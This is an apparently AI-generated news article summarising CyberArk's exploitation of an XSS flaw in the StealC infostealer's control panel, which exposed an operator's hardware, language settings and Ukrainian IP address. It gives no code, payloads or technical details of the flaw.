Ethical Hacking News
A recent discovery by CyberArk researchers exposed sensitive information about StealC malware operators, including their hardware and location. A previously unknown XSS flaw allowed researchers to hijack the control panel used by StealC operators, providing valuable insights into the threat actors' systems. This vulnerability has the potential to cause significant disruption in the use of the StealC malware, as it forces operators to re-evaluate using the platform.
Researchers discovered an XSS flaw in the StealC control panel, allowing them to hijack sessions remotely. The vulnerability enabled collection of browser and hardware fingerprints, active session cookies, and location indicators of the threat actor's computers. CyberArk researchers exploited the vulnerability to identify a StealC customer (YouTubeTA), who hijacked old YouTube channels and ran malware campaigns, collecting over 5,000 victim logs and 30 million cookies. The discovery highlights the ongoing cat-and-mouse game between cybersecurity researchers and malicious actors. CyberArk's decision to disclose the vulnerability aimed to cause disruption in the StealC MaaS market and encourage operators to re-evaluate using the malware.
The world of cybercrime has recently seen a significant development that sheds light on the inner workings of one of the most notorious malware platforms out there - StealC. In this article, we will delve into the details of how researchers were able to hijack the control panel used by operators of the StealC info-stealing malware, exposing valuable information about the attackers' hardware and location.
StealC emerged in early 2023 with aggressive promotion on dark web cybercrime channels. It grew in popularity due to its evasion and extensive data theft capabilities. The malware was designed to be highly flexible, allowing its operators to customize it based on their specific needs. This flexibility made StealC an attractive option for many malicious actors looking to make a profit.
However, with great power comes great vulnerability. In the following years, StealC's developer added multiple enhancements, including Telegram bot support and a new builder that could generate StealC builds based on templates and custom data theft rules. Around this time, the source code for the malware's administration panel was leaked, giving researchers an opportunity to analyze it.
CyberArk researchers soon discovered an XSS flaw in the web-based control panel used by operators of the StealC info-stealing malware. This vulnerability allowed them to collect browser and hardware fingerprints of StealC operators, observe active sessions, steal session cookies from the panel, and hijack panel sessions remotely. The researchers were able to exploit this vulnerability to identify characteristics of the threat actor's computers, including general location indicators and computer hardware details.
"By exploiting the vulnerability, we were able to identify characteristics of the threat actor's computers, including general location indicators and computer hardware details," the researchers say. "Additionally, we were able to retrieve active session cookies, which allowed us to gain control of sessions from our own machines."
The StealC builder panelSource: CyberArk
CyberArk did not disclose specific details about the XSS vulnerability to prevent StealC operators from quickly pinpointing and fixing it.
One case that highlights the impact of this vulnerability is that of a StealC customer, referred to as 'YouTubeTA', who hijacked old, legitimate YouTube channels likely using compromised credentials, and planted infecting links. The cybercriminal ran malware campaigns throughout 2025, collecting over 5,000 victim logs, stealing approximately 390,000 passwords and 30 million cookies (most of them non-sensitive).
Markers page on YouTubeTA's panelSource: CyberArk
Screenshots from the threat actor’s panel indicate that most infections occurred when victims searched for cracked versions of Adobe Photoshop and Adobe After Effects. By leveraging the XSS flaw, the researchers could determine that the attacker used an Apple M3-based system with English and Russian language settings, used the Eastern European time zone, and was accessing the internet via Ukraine.
Their location was exposed when the threat actor forgot to connect the StealC panel through VPN. This revealed their real IP address, which was linked to Ukrainian ISP TRK Cable TV.
CyberArk notes that malware-as-a-service (MaaS) platforms enable rapid scaling but also pose a significant risk of exposure to threat actors.
BleepingComputer has contacted CyberArk to ask why they chose to disclose the StealC XSS flaw now. Researcher Ari Novick said that they hope to cause disruption to the operation, since there has been "a spike in recent months in the number of StealC operators, possibly in response to the drama around Lumma a couple of months ago."
"By posting the existence of the XSS we hope to cause at least some disruption in the use of the StealC malware, as operators re-evaluate using it. Since there are now relatively many operators, it seemed like a prime opportunity to potentially cause a fairly significant disruption in the MaaS market," Novick said.
In conclusion, the discovery of an XSS flaw in the StealC control panel highlights the ongoing cat-and-mouse game between cybersecurity researchers and malicious actors. As these platforms continue to evolve and improve, it is essential for researchers to stay one step ahead, identifying vulnerabilities that can be used to disrupt the operations of threat actors.
This article serves as a reminder that even seemingly secure systems can have vulnerabilities waiting to be exploited. It also underscores the importance of collaboration between cybersecurity professionals and researchers in sharing knowledge and working together to combat malicious threats.
Related Information:
https://www.ethicalhackingnews.com/articles/StealC-info-stealing-malwares-control-panel-hacked-by-researchers-exposing-threat-actors-hardware-and-location-ehn.shtml
https://www.bleepingcomputer.com/news/security/stealc-hackers-hacked-as-researchers-hijack-malware-control-panels/
https://thehackernews.com/2025/11/hackers-hijack-blender-3d-assets-to.html
https://dailysecurityreview.com/security-spotlight/stealc-malware-upgraded-with-advanced-data-theft-and-stealth-capabilities/
Published: Fri Jan 16 15:08:13 2026 by llama3.2 3B Q4_K_M
